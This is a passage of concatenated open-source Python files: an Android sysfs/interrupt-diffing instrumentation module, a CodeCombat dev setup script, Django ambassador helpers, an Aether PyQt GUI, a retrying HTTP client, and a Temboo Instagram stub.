mount_command = 'mount -t tmpfs -o size={} tmpfs {}'
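    # e.g. mount_command.format('32m', '/data/local/tmp/temp-fs') yields
    # 'mount -t tmpfs -o size=32m tmpfs /data/local/tmp/temp-fs'
    # (the mount point here is illustrative; see tmpfs_mount_point below).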
extract_timeout = 30
tarname = 'sysfs.tar'
DEVICE_PATH = 0
BEFORE_PATH = 1
AFTER_PATH = 2
DIFF_PATH = 3
parameters = [
Parameter('paths', kind=list_of_strings, mandatory=True,
description="""A list of paths to be pulled from the device. These could be directories
as well as files.""",
global_alias='sysfs_extract_dirs'),
Parameter('use_tmpfs', kind=bool, default=None,
description="""
Specifies whether tmpfs should be used to cache sysfile trees and then pull them down
                  as a tarball. This is significantly faster than just copying the directory trees from
                  the device directly, but requires root and may not work on all devices. Defaults to
``True`` if the device is rooted and ``False`` if it is not.
"""),
Parameter('tmpfs_mount_point', default=None,
description="""Mount point for tmpfs partition used to store snapshots of paths."""),
Parameter('tmpfs_size', default='32m',
description="""Size of the tempfs partition."""),
]
def initialize(self, context):
if not self.device.is_rooted and self.use_tmpfs: # pylint: disable=access-member-before-definition
            raise ConfigError('use_tmpfs must be False for an unrooted device.')
elif self.use_tmpfs is None: # pylint: disable=access-member-before-definition
self.use_tmpfs = self.device.is_rooted
if self.use_tmpfs:
self.on_device_before = self.device.path.join(self.tmpfs_mount_point, 'before')
self.on_device_after = self.device.path.join(self.tmpfs_mount_point, 'after')
if not self.device.file_exists(self.tmpfs_mount_point):
self.device.execute('mkdir -p {}'.format(self.tmpfs_mount_point), as_root=True)
self.device.execute(self.mount_command.format(self.tmpfs_size, self.tmpfs_mount_point),
as_root=True)
def setup(self, context):
before_dirs = [
_d(os.path.join(context.output_directory, 'before', self._local_dir(d)))
for d in self.paths
]
after_dirs = [
_d(os.path.join(context.output_directory, 'after', self._local_dir(d)))
for d in self.paths
]
diff_dirs = [
_d(os.path.join(context.output_directory, 'diff', self._local_dir(d)))
for d in self.paths
]
self.device_and_host_paths = zip(self.paths, before_dirs, after_dirs, diff_dirs)
if self.use_tmpfs:
for d in self.paths:
before_dir = self.device.path.join(self.on_device_before,
self.device.path.dirname(as_relative(d)))
after_dir = self.device.path.join(self.on_device_after,
self.device.path.dirname(as_relative(d)))
if self.device.file_exists(before_dir):
self.device.execute('rm -rf {}'.format(before_dir), as_root=True)
self.device.execute('mkdir -p {}'.format(before_dir), as_root=True)
if self.device.file_exists(after_dir):
self.device.execute('rm -rf {}'.format(after_dir), as_root=True)
self.device.execute('mkdir -p {}'.format(after_dir), as_root=True)
def slow_start(self, context):
if self.use_tmpfs:
for d in self.paths:
dest_dir = self.device.path.join(self.on_device_before, as_relative(d))
if '*' in dest_dir:
dest_dir = self.device.path.dirname(dest_dir)
self.device.execute('{} cp -Hr {} {}'.format(self.device.busybox, d, dest_dir),
as_root=True, check_exit_code=False)
else: # not rooted
for dev_dir, before_dir, _, _ in self.device_and_host_paths:
self.device.pull_file(dev_dir, before_dir)
def slow_stop(self, context):
if self.use_tmpfs:
for d in self.paths:
dest_dir = self.device.path.join(self.on_device_after, as_relative(d))
if '*' in dest_dir:
dest_dir = self.device.path.dirname(dest_dir)
self.device.execute('{} cp -Hr {} {}'.format(self.device.busybox, d, dest_dir),
as_root=True, check_exit_code=False)
else: # not using tmpfs
for dev_dir, _, after_dir, _ in self.device_and_host_paths:
self.device.pull_file(dev_dir, after_dir)
def update_result(self, context):
if self.use_tmpfs:
on_device_tarball = self.device.path.join(self.device.working_directory, self.tarname)
on_host_tarball = self.device.path.join(context.output_directory, self.tarname + ".gz")
self.device.execute('{} tar cf {} -C {} .'.format(self.device.busybox,
on_device_tarball,
self.tmpfs_mount_point),
as_root=True)
self.device.execute('chmod 0777 {}'.format(on_device_tarball), as_root=True)
self.device.execute('{} gzip {}'.format(self.device.busybox,
on_device_tarball))
self.device.pull_file(on_device_tarball + ".gz", on_host_tarball)
with tarfile.open(on_host_tarball, 'r:gz') as tf:
tf.extractall(context.output_directory)
self.device.delete_file(on_device_tarball + ".gz")
os.remove(on_host_tarball)
for paths in self.device_and_host_paths:
after_dir = paths[self.AFTER_PATH]
dev_dir = paths[self.DEVICE_PATH].strip('*') # remove potential trailing '*'
if (not os.listdir(after_dir) and
self.device.file_exists(dev_dir) and
self.device.listdir(dev_dir)):
self.logger.error('sysfs files were not pulled from the device.')
self.device_and_host_paths.remove(paths) # Path is removed to skip diffing it
for _, before_dir, after_dir, diff_dir in self.device_and_host_paths:
_diff_sysfs_dirs(before_dir, after_dir, diff_dir)
def teardown(self, context):
self._one_time_setup_done = []
def finalize(self, context):
if self.use_tmpfs:
try:
self.device.execute('umount {}'.format(self.tmpfs_mount_point), as_root=True)
except (DeviceError, CalledProcessError):
                # assume the path is a plain directory rather than a mount point
pass
self.device.execute('rm -rf {}'.format(self.tmpfs_mount_point),
as_root=True, check_exit_code=False)
def validate(self):
if not self.tmpfs_mount_point: # pylint: disable=access-member-before-definition
self.tmpfs_mount_point = self.device.path.join(self.device.working_directory, 'temp-fs')
def _local_dir(self, directory):
return os.path.dirname(as_relative(directory).replace(self.device.path.sep, os.sep))
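        # Illustration (assuming as_relative() strips the leading separator):
        # _local_dir('/sys/devices/system/cpu') -> 'sys/devices/system' on a
        # POSIX host, i.e. the host-side directory mirroring the device path.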
class ExecutionTimeInstrument(Instrument):
name = 'execution_time'
description = """
Measure how long it took to execute the run() methods of a Workload.
"""
priority = 15
def __init__(self, device, **kwargs):
super(ExecutionTimeInstrument, self).__init__(device, **kwargs)
self.start_time = None
self.end_time = None
def on_run_start(self, context):
signal.connect(self.get_start_time, signal.BEFORE_WORKLOAD_EXECUTION, priority=self.priority)
signal.connect(self.get_stop_time, signal.AFTER_WORKLOAD_EXECUTION, priority=self.priority)
def get_start_time(self, context):
self.start_time = time.time()
def get_stop_time(self, context):
self.end_time = time.time()
def update_result(self, context):
execution_time = self.end_time - self.start_time
context.result.add_metric('execution_time', execution_time, 'seconds')
class ApkVersion(Instrument):
name = 'apk_version'
description = """
(DEPRECATED) Extracts APK versions for workloads that have them.
This instrument is deprecated and should not be used. It will be removed in
future versions of Workload Automation.
Versions of Android packages are now automatically attached to the results as
"apk_version" classfiers.
"""
def __init__(self, device, **kwargs):
super(ApkVersion, self).__init__(device, **kwargs)
self.apk_info = None
def setup(self, context):
if hasattr(context.workload, 'apk_file'):
self.apk_info = ApkInfo(context.workload.apk_file)
else:
self.apk_info = None
def update_result(self, context):
if self.apk_info:
context.result.add_metric(self.name, self.apk_info.version_name)
class InterruptStatsInstrument(Instrument):
name = 'interrupts'
description = """
Pulls the ``/proc/interrupts`` file before and after workload execution and diffs them
to show what interrupts occurred during that time.
"""
def __init__(self, device, **kwargs):
super(InterruptStatsInstrument, self).__init__(device, **kwargs)
self.before_file = None
self.after_file = None
self.diff_file = None
def setup(self, context):
self.before_file = os.path.join(context.output_directory, 'before', 'proc', 'interrupts')
self.after_file = os.path.join(context.output_directory, 'after', 'proc', 'interrupts')
self.diff_file = os.path.join(context.output_directory, 'diff', 'proc', 'interrupts')
def start(self, context):
with open(_f(self.before_file), 'w') as wfh:
wfh.write(self.device.execute('cat /proc/interrupts'))
def stop(self, context):
with open(_f(self.after_file), 'w') as wfh:
wfh.write(self.device.execute('cat /proc/interrupts'))
def update_result(self, context):
# If workload execution failed, the after_file may not have been created.
if os.path.isfile(self.after_file):
_diff_interrupt_files(self.before_file, self.after_file, _f(self.diff_file))
class DynamicFrequencyInstrument(SysfsExtractor):
name = 'cpufreq'
description = """
Collects dynamic frequency (DVFS) settings before and after workload execution.
"""
tarname = 'cpufreq.tar'
parameters = [
Parameter('paths', mandatory=False, override=True),
]
def setup(self, context):
self.paths = ['/sys/devices/system/cpu']
if self.use_tmpfs:
self.paths.append('/sys/class/devfreq/*') # the '*' would cause problems for adb pull.
super(DynamicFrequencyInstrument, self).setup(context)
def validate(self):
# temp-fs would have been set in super's validate, if not explicitly specified.
if not self.tmpfs_mount_point.endswith('-cpufreq'): # pylint: disable=access-member-before-definition
self.tmpfs_mount_point += '-cpufreq'
def _diff_interrupt_files(before, after, result): # pylint: disable=R0914
output_lines = []
with open(before) as bfh:
with open(after) as ofh:
for bline, aline in izip(bfh, ofh):
bchunks = bline.strip().split()
while True:
achunks = aline.strip().split()
if achunks[0] == bchunks[0]:
diffchunks = ['']
diffchunks.append(achunks[0])
diffchunks.extend([diff_tokens(b, a) for b, a
in zip(bchunks[1:], achunks[1:])])
output_lines.append(diffchunks)
break
else: # new category appeared in the after file
diffchunks = ['>'] + achunks
output_lines.append(diffchunks)
try:
aline = ofh.next()
except StopIteration:
break
# Offset heading columns by one to allow for row labels on subsequent
# lines.
output_lines[0].insert(0, '')
# Any "columns" that do not have headings in the first row are not actually
    # columns -- they are a single column where space-separated words got
# split. Merge them back together to prevent them from being
# column-aligned by write_table.
table_rows = [output_lines[0]]
num_cols = len(output_lines[0])
for row in output_lines[1:]:
table_row = row[:num_cols]
table_row.append(' '.join(row[num_cols:]))
table_rows.append(table_row)
with open(result, 'w') as wfh:
write_table(table_rows, wfh)
def _diff_sysfs_dirs(before, after, result): # pylint: disable=R0914
before_files = []
os.path.walk(before,
lambda arg, dirname, names: arg.extend([os.path.join(dirname, f) for f in names]),
before_files
)
before_files = filter(os.path.isfile, before_files)
files = [os.path.relpath(f, before) for f in before_files]
after_files = [os.path.join(after, f) for f in files]
diff_files = [os.path.join(result, f) for f in files]
for bfile, afile, dfile in zip(before_files, after_files, diff_files):
if not os.path.isfile(afile):
logger.debug('sysfs_diff: {} does not exist or is not a file'.format(afile))
continue
with open(bfile) as bfh, open(afile) as afh: # pylint: disable=C0321
with open(_f(dfile), 'w') as dfh:
for i, (bline, aline) in enumerate(izip_longest(bfh, afh), 1):
if aline is None:
logger.debug('Lines missing from {}'.format(afile))
break
bchunks = re.split(r'(\W+)', bline)
achunks = re.split(r'(\W+)', aline)
if len(bchunks) != len(achunks):
logger.debug('Token length mismatch in {} on line {}'.format(bfile, i))
dfh.write('xxx ' + bline)
continue
if ((len([c for c in bchunks if c.strip()]) == len([c for c in achunks if c.strip()]) == 2) and
(bchunks[0] == achunks[0])):
# if there are only two columns and the first column is the
# same, assume it's a "header" column and do not diff it.
dchunks = [bchunks[0]] + [diff_tokens(b, a) for b, a in zip(bchunks[1:], achunks[1:])]
else:
dchunks = [diff_tokens(b, a) for b, a in zip(bchunks, achunks)]
dfh.write(''.join(dchunks))
|
chase-qi/workload-automation
|
wlauto/instrumentation/misc/__init__.py
|
Python
|
apache-2.0
| 17,103
|
__author__ = u'schmatz'
import errors
import configuration
import mongo
import node
import repositoryInstaller
import ruby
import shutil
import os
import glob
import subprocess
def print_computer_information(os_name,address_width):
print(os_name + " detected, architecture: " + str(address_width) + " bit")
def constructSetup():
config = configuration.Configuration()
address_width = config.system.get_virtual_memory_address_width()
if config.system.operating_system == u"mac":
print_computer_information("Mac",address_width)
return MacSetup(config)
elif config.system.operating_system == u"win":
print_computer_information("Windows",address_width)
raise NotImplementedError("Windows is not supported at this time.")
elif config.system.operating_system == u"linux":
print_computer_information("Linux",address_width)
return LinuxSetup(config)
class SetupFactory(object):
def __init__(self,config):
self.config = config
self.mongo = mongo.MongoDB(self.config)
self.node = node.Node(self.config)
self.repoCloner = repositoryInstaller.RepositoryInstaller(self.config)
self.ruby = ruby.Ruby(self.config)
def setup(self):
mongo_version_string = ""
try:
mongo_version_string = subprocess.check_output("mongod --version",shell=True)
        except (subprocess.CalledProcessError, OSError):
print("Mongod not found.")
if "v2.5.4" not in mongo_version_string:
print("MongoDB 2.5.4 not found, so installing...")
self.mongo.download_dependencies()
self.mongo.install_dependencies()
self.node.download_dependencies()
self.node.install_dependencies()
#self.repoCloner.cloneRepository()
self.repoCloner.install_node_packages()
self.ruby.install_gems()
print ("Doing initial bower install...")
bower_path = self.config.directory.root_dir + os.sep + "coco" + os.sep + "node_modules" + os.sep + ".bin" + os.sep + "bower"
subprocess.call(bower_path + " --allow-root install",shell=True,cwd=self.config.directory.root_dir + os.sep + "coco")
print("Removing temporary directories")
self.config.directory.remove_tmp_directory()
print("Changing permissions of files...")
#TODO: Make this more robust and portable(doesn't pose security risk though)
subprocess.call("chmod -R 755 " + self.config.directory.root_dir + os.sep + "coco" + os.sep + "bin",shell=True)
chown_command = "chown -R " + os.getenv("SUDO_USER") + " bower_components"
chown_directory = self.config.directory.root_dir + os.sep + "coco"
subprocess.call(chown_command,shell=True,cwd=chown_directory)
print("Done! If you want to start the server, head into /coco/bin and run ")
print("1. ./coco-mongodb")
print("2. ./coco-brunch ")
print("3. ./coco-dev-server")
print("NOTE: brunch may need to be run as sudo if it doesn't work (ulimit needs to be set higher than default)")
print("Once brunch is done, visit http://localhost:3000!")
def cleanup(self):
self.config.directory.remove_tmp_directory()
class MacSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class WinSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class LinuxSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
|
5y/codecombat
|
scripts/devSetup/factories.py
|
Python
|
mit
| 3,479
|
from django.contrib.auth.models import User
from django_countries import countries
def get_user(user_id):
user = User.objects.get(id=user_id)
return user
def get_user_profile(user_id):
user = User.objects.get(id=user_id)
return user.profile
def get_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='ambassadors').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_main_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='main').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_not_main_ambassadors(country_code=None):
ambassadors = []
all_ambassadors = User.objects.filter(groups__name='ambassadors').exclude(groups__name='main').order_by('date_joined')
for ambassador in all_ambassadors:
if country_code:
if ambassador.profile.country == country_code:
ambassadors.append(ambassador.profile)
else:
ambassadors.append(ambassador.profile)
return ambassadors
def get_ambassadors_for_countries():
ambassadors = get_ambassadors()
countries_ambassadors = []
# list countries minus two CUSTOM_COUNTRY_ENTRIES
for code, name in list(countries)[2:]:
readable_name = unicode(name)
main_ambassadors = get_main_ambassadors(code)
found_ambassadors = get_not_main_ambassadors(code)
countries_ambassadors.append((code, readable_name,found_ambassadors, main_ambassadors))
countries_ambassadors.sort()
return countries_ambassadors
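# Each entry of the returned list is a 4-tuple, e.g. (illustrative values):
# ('AT', u'Austria', [<non-main profiles>], [<main profiles>])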
def get_ambassadors_for_country(country):
ambassadors = User.objects.filter(groups__name='ambassadors', userprofile__country=country)
return ambassadors
def update_user_email(user_id, new_email):
user = User.objects.get(id=user_id)
user.email = new_email
user.save(update_fields=["email"])
return user
|
ercchy/coding-events
|
web/processors/user.py
|
Python
|
mit
| 2,185
|
import globals
from globals import PLATFORM, FROZEN, BASEDIR
from PyQt5.QtWidgets import QSystemTrayIcon, QWidget, QMenu, QSplashScreen
from PyQt5 import QtGui
from PyQt5 import QtPrintSupport
from PyQt5 import QtCore
import sys, webbrowser
from PyQt5.QtCore import *
from PyQt5.QtWebKitWidgets import *
from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog
from datetime import datetime
class Aether(QApplication):
def __init__(self):
QApplication.__init__(self, sys.argv)
QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)
QApplication.setQuitOnLastWindowClosed(False)
def onClickOnDock(self): # This only gets called on Mac.
##print('dock clicked')
self.view.show()
self.view.raise_() # because the app needs to fire up in the bg to be brought to front.
globals.raiseAndFocusApp()
class ModifierEventFilter(QObject):
def eventFilter(self, receiver, event):
if (event.type() == QEvent.KeyPress):
if (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_W):
self.view.hide()
return True
elif (event.key() == QtCore.Qt.Key_Control): # Control is Cmd in Mac.
global lastModifierKeypressDatetime
lastModifierKeypressDatetime = datetime.now()
return True
            elif (event.key() == QtCore.Qt.Key_Escape):
return True # Esc key does not move. Return true stops the propagation there.
else:
#Call Base Class Method to Continue Normal Event Processing
return super(ModifierEventFilter,self).eventFilter(receiver, event)
#elif (event.type() == QEvent.ApplicationActivate):
# ##print('app activate fired')
# view.show()
# toggleVisibilityMenuItem.setText('Hide Aether')
#
# return True
else:
#Call Base Class Method to Continue Normal Event Processing
return super(ModifierEventFilter,self).eventFilter(receiver, event)
class AetherMainWindow(QMainWindow):
def __init__(self, charon, reactor, baseurl, app):
super(AetherMainWindow, self).__init__()
self.resize(1148, 680)
self.app = app
self.reactor = reactor
webView = AetherWebView(reactor, baseurl)
webView.page().mainFrame().addToJavaScriptWindowObject("Charon", charon)
webView.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.setContextMenuPolicy(Qt.NoContextMenu)
self.setCentralWidget(webView)
self.webView = webView
self.JSContext = webView.page().mainFrame().evaluateJavaScript
self.Hermes = charon.Hermes
#self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
if PLATFORM == 'WIN':
self.setWindowIcon(QtGui.QIcon(BASEDIR + 'Assets/aether-white-tray.ico'))
# from PyQt5.QtWebKit import QWebSettings
# QWebSettings.globalSettings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True)
# self.inspector = QWebInspector()
# self.inspector.resize(1450, 300)
# self.inspector.move(0,0)
# self.inspector.setPage(self.webView.page())
# self.setContextMenuPolicy(Qt.DefaultContextMenu)
def hideEvent(self, QHideEvent):
if PLATFORM == 'LNX':
# Linux GUI behaves differently: since there is no tray icon or a background process, when
# the app is closed by pressing the X button, it actually has to be closed. It can't keep running.
self.pp.stop()
if self.reactor.threadpool is not None:
self.reactor.threadpool.stop()
self.close()
self.reactor.stop()
self.app.quit()
sys.exit()
class AetherWebView(QWebView):
def __init__(self, reactor, baseurl):
super(AetherWebView, self).__init__()
self.reactor = reactor
if FROZEN:
self.load(QUrl('file:///' + BASEDIR + 'GUI/WebKitApp/index.html'))
else:
self.load(QUrl('file:///' + baseurl + 'GUI/WebKitApp/index.html'))
self.page().action(QWebPage.Reload).setVisible(False)
self.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
def linkClick(url):
webbrowser.open(str(url.toString()))
self.linkClicked.connect(linkClick)
class SystemTrayIcon(QSystemTrayIcon):
def __init__(self, basedir, app, parent=None):
if PLATFORM == 'OSX':
if app.devicePixelRatio() == 2:
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-black-tray.svg')
self.iconActive = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray.svg')
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-blue-tray.svg')
else:
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-black-tray.png')
self.iconActive = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray.png')
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-blue-tray.png')
elif PLATFORM == 'WIN':
self.icon = QtGui.QIcon(BASEDIR+'Assets/aether-white-tray-win.svg')
self.iconActive = self.icon
self.iconHighlight = QtGui.QIcon(BASEDIR+'Assets/aether-green-tray-win.svg')
else:
pass
QSystemTrayIcon.__init__(self, self.icon, parent)
self.menu = QMenu(parent)
if globals.appIsPaused:
self.menu.addAction('Paused').setDisabled(True)
else:
self.menu.addAction('Online').setDisabled(True)
self.globalStatusMenuItem = self.menu.actions()[0]
self.menu.addSeparator() # 1
self.menu.addAction('You have no replies.').setDisabled(True)
self.messagesMenuItem = self.menu.actions()[2]
def goToMessages():
self.messagesMenuItem.setText('You have no replies.')
self.messagesMenuItem.setDisabled(True)
parent.show()
parent.raise_()
jsString = \
("firstFrameScope = angular.element(document.getElementById('first-frame-contents')).scope();"
"firstFrameScope.repliesButtonClick();"
"firstFrameScope.$apply();"
)
self.webView.JSContext(jsString)
            # Reach out to the JS context via qtwebkit and tell it to open messages.
self.messagesMenuItem.triggered.connect(goToMessages)
self.menu.addSeparator() # 3
if globals.appIsPaused:
self.menu.addAction('Resume')
else:
self.menu.addAction('Pause')
self.togglePauseMenuItem = self.menu.actions()[4]
def togglePause():
if globals.appIsPaused:
globals.appIsPaused = False
self.togglePauseMenuItem.setText('Pause')
self.globalStatusMenuItem.setText('Online')
else:
globals.appIsPaused = True
self.togglePauseMenuItem.setText('Resume')
self.globalStatusMenuItem.setText('Paused')
self.togglePauseMenuItem.triggered.connect(togglePause)
self.menu.addAction('Show Aether')
self.toggleVisibilityMenuItem = self.menu.actions()[5]
def makeVisible():
parent.show()
parent.raise_()
if PLATFORM == 'OSX':
globals.raiseAndFocusApp()
self.toggleVisibilityMenuItem.triggered.connect(makeVisible)
self.menu.addAction('Email the developer')
self.emailDevMenuItem = self.menu.actions()[6]
def emailDev():
mailInitialiser = \
QUrl('mailto:burak@nehbit.net'
'?subject=Feedback for Aether'
'&body=Hello there! Thanks for taking time to give feedback, I really appreciate it. '
'If you are having problems, please follow the directions at www.getaether.net/sending_logs, '
'and send me the produced logs. Thanks! You can delete this text before sending. '
'You can find my PGP key here: pgp.mit.edu:11371/pks/lookup?search=Burak+Nehbit')
QtGui.QDesktopServices.openUrl(mailInitialiser)
self.emailDevMenuItem.triggered.connect(emailDev)
self.menu.addSeparator() # 5
self.menu.addAction('Settings')
self.settingsMenuItem = self.menu.actions()[8]
def goToSettings():
self.settingsMenuItem.setText('Settings')
self.settingsMenuItem.setDisabled(False)
if parent.isHidden():
parent.show()
parent.raise_()
jsString = \
("firstFrameScope = angular.element(document.getElementById('first-frame-contents')).scope();"
"firstFrameScope.settingsButtonClick();"
"firstFrameScope.$apply();"
)
self.webView.JSContext(jsString)
self.settingsMenuItem.triggered.connect(goToSettings)
self.menu.addSeparator() # 6
self.menu.addAction('Quit Aether')
self.quitAppMenuItem = self.menu.actions()[10]
# This is below reactor.run to allow access from other places outside main.
def quitApp():
# This is buggy...
if parent.reactor.threadpool is not None:
parent.reactor.threadpool.stop()
parent.close()
parent.reactor.stop()
app.quit()
sys.exit()
# self.protInstance.killApp()
# def finishExit():
# parent.reactor.stop()
# app.quit()
# sys.exit()
# d.addCallback(finishExit)
self.quitAppMenuItem.triggered.connect(quitApp)
self.setContextMenu(self.menu)
self.setIcon(self.icon)
def changeIconToActiveState():
self.setIcon(self.iconActive)
def changeIconToPassiveState():
self.setIcon(self.icon)
self.menu.aboutToShow.connect(changeIconToActiveState)
self.menu.aboutToHide.connect(changeIconToPassiveState)
if PLATFORM == 'WIN':
def showOnLeftClick(reason):
if reason == self.Trigger:
makeVisible() # I hate that Python doesn't have anonymous functions.
self.activated.connect(showOnLeftClick)
def lightUpIcon(self):
self.setIcon(self.iconHighlight)
self.messagesMenuItem.setText('New replies available.')
self.messagesMenuItem.setDisabled(False)
def makeIconGoDark(self):
self.setIcon(self.icon)
self.messagesMenuItem.setText('You have no replies.')
self.messagesMenuItem.setDisabled(True)
|
GeoffMaciolek/aether-public
|
GUI/guiElements.py
|
Python
|
agpl-3.0
| 10,851
|
import time
import functools
import itertools as it
import requests
from requests.exceptions import ConnectTimeout, ReadTimeout, ConnectionError
from circuit import CircuitOpenError
import logging
from .breaker import CircuitBreakerSet
from .exceptions import AllHostsUnreachableException, MaxRetriesReached
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Retriable(object):
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __call__(self, **new_kwargs):
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
return self.func(*self.args, **kwargs)
def __repr__(self):
return '<Retriable (%s, %s, %s)>' % (self.func, self.args, self.kwargs)
class SmartClient(object):
'''This client is used when dealing with existing client libraries that
issue their own requests (whether HTTP or some other protocol). This client
    then provides host selection, retries and per-host circuit breaking around
    those calls.
To create an instance, you need to let it know about the types of errors
that it can catch in order to retry. For HTTP, this is typically connection
    related errors, however your library might wrap them.
There are 2 ways to make a function retriable. The first is by creating a
retriable object::
# create the signature
retriable = smart_client.Retriable(my_client.retrieve, id)
# now execute it
item = smart_client.retry(retriable, max_tries=5)
    The second is using retry() as a decorator:
@smart_client.retry
def get_object(id):
return my_client.retrieve(id)
@smart_client.retry(max_tries=5)
def get_object(id):
return my_client.retrieve(id)
'''
Retriable = Retriable
def __init__(self, name, error_types=None, hosts_provider=None, hosts=None):
self.name = name
self.error_types = error_types
self.breakers = CircuitBreakerSet(error_types or [])
# TODO: Check that one and only one of these is specified.
self._hosts_iter = it.cycle(hosts) if hosts else None
self._hosts_provider = hosts_provider
def get_hostname(self):
if self._hosts_provider:
return self._hosts_provider.get_hostname()
else:
return next(self._hosts_iter)
def retry(self, retriable=None, max_tries=3, backoff=None, send_host=False):
# Creating a decorator: @client.retry(max_tries=5)
if retriable is None:
return functools.partial(self.retry, max_tries=max_tries, backoff=backoff, send_host=send_host)
# Being used as a decorator: @client.retry
if not isinstance(retriable, Retriable):
@functools.wraps(retriable)
def wrapper(*args, **kwargs):
_retriable = Retriable(retriable, *args, **kwargs)
                return self.retry(_retriable, max_tries=max_tries, backoff=backoff, send_host=send_host)
return wrapper
# actually do the retries
for i in xrange(1, max_tries + 1):
host = self.get_hostname()
try:
logger.info('Attempting %s for host %s ...' % (retriable, host))
with self.breakers.context(host):
if send_host:
return retriable(host=host)
else:
return retriable()
except CircuitOpenError:
if self.breakers.all_closed():
                    raise AllHostsUnreachableException('All hosts unreachable for %s' % self.name)
logger.warning('Silenced request failure for host %s due to CircuitOpenError.', host)
except tuple(self.breakers.error_types) as e:
logger.warning('Silenced %s for host %s.', e, host)
if backoff and i < max_tries: # Don't sleep after last attempt
time.sleep(backoff() if callable(backoff) else backoff)
raise MaxRetriesReached('Attempted %d times for %s' % (max_tries, self.name))
class SmartHTTPClient(SmartClient):
'''A smart HTTP client that knows about the requests library's error types.
    You must provide a hosts_provider or a list of hosts.
'''
HTTP_ERROR_TYPES = (ConnectTimeout, ReadTimeout, ConnectionError)
def __init__(self, name, hosts_provider=None, hosts=None):
super(SmartHTTPClient, self).__init__(name, self.HTTP_ERROR_TYPES, hosts_provider, hosts)
# Keep a session per host
self._sessions = {}
def get(self, path, *args, **kwargs):
req = self.Retriable(self._send, 'GET', path, *args, **kwargs)
return self.retry(req, send_host=True)
def _send(self, method, path, host=None, **kwargs):
url = 'http://' + host + '/' + path.lstrip('/')
session = self.get_session(host)
prepared = session.prepare_request(requests.Request(method, url, **kwargs))
return session.send(prepared)
def get_session(self, hostname):
session = self._sessions.get(hostname)
if not session:
session = self._sessions[hostname] = requests.Session()
return session
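# Minimal usage sketch (hypothetical host addresses):
#   client = SmartHTTPClient('search-api', hosts=['10.0.0.1:8080', '10.0.0.2:8080'])
#   resp = client.get('/v1/health')  # rotated across hosts, per-host circuit breaking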
|
jbeluch/smartclient
|
smartclient/client.py
|
Python
|
mit
| 5,176
|
from django.conf.urls import include, url
from .views import alquiler_nuevo, home
from django.contrib.auth.decorators import login_required
from departamentos.views import home, details
urlpatterns = [
]
|
acs-um/deptos
|
deptos/departamentos/urls.py
|
Python
|
apache-2.0
| 209
|
"""Plugins for starting Vumi workers from twistd."""
from vumi.servicemaker import (VumiWorkerServiceMaker,
DeprecatedStartWorkerServiceMaker)
# Having instances of IServiceMaker present magically announces the
# service makers to twistd.
# See: http://twistedmatrix.com/documents/current/core/howto/tap.html
vumi_worker = VumiWorkerServiceMaker()
start_worker = DeprecatedStartWorkerServiceMaker()
|
TouK/vumi
|
twisted/plugins/vumi_worker_starter.py
|
Python
|
bsd-3-clause
| 432
|
import sys
import os
from subprocess import call
def cut(filename, out):
with open(filename, 'r') as f:
flag = False
codes = []
for line in f.readlines():
if line.strip() == '```go':
flag = True
            # Only treat a bare ``` as the terminator once inside the go block.
            elif flag and line.strip() == '```':
with open(out, 'w') as g:
g.write("".join(codes))
return
elif flag:
codes.append(line)
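# For example, given a markdown file whose body contains
#     ```go
#     package main
#     func main() {}
#     ```
# cut() writes only the two Go source lines between the fences to `out`.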
if __name__ == '__main__':
filename = sys.argv[1]
out = '/tmp/test.go'
cut(filename, out)
ret = call(['go', 'build', '-o', '/tmp/test', out])
os.remove(out)
os.remove('/tmp/test')
sys.exit(ret)
|
ramrunner/gobgp
|
test/scenario_test/ci-scripts/build_embeded_go.py
|
Python
|
apache-2.0
| 682
|
# -*- coding: utf-8 -*-
###############################################################################
#
# RecentlyTaggedMedia
# Retrieves a list of recently tagged media.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class RecentlyTaggedMedia(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the RecentlyTaggedMedia Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(RecentlyTaggedMedia, self).__init__(temboo_session, '/Library/Instagram/RecentlyTaggedMedia')
def new_input_set(self):
return RecentlyTaggedMediaInputSet()
def _make_result_set(self, result, path):
return RecentlyTaggedMediaResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return RecentlyTaggedMediaChoreographyExecution(session, exec_id, path)
class RecentlyTaggedMediaInputSet(InputSet):
"""
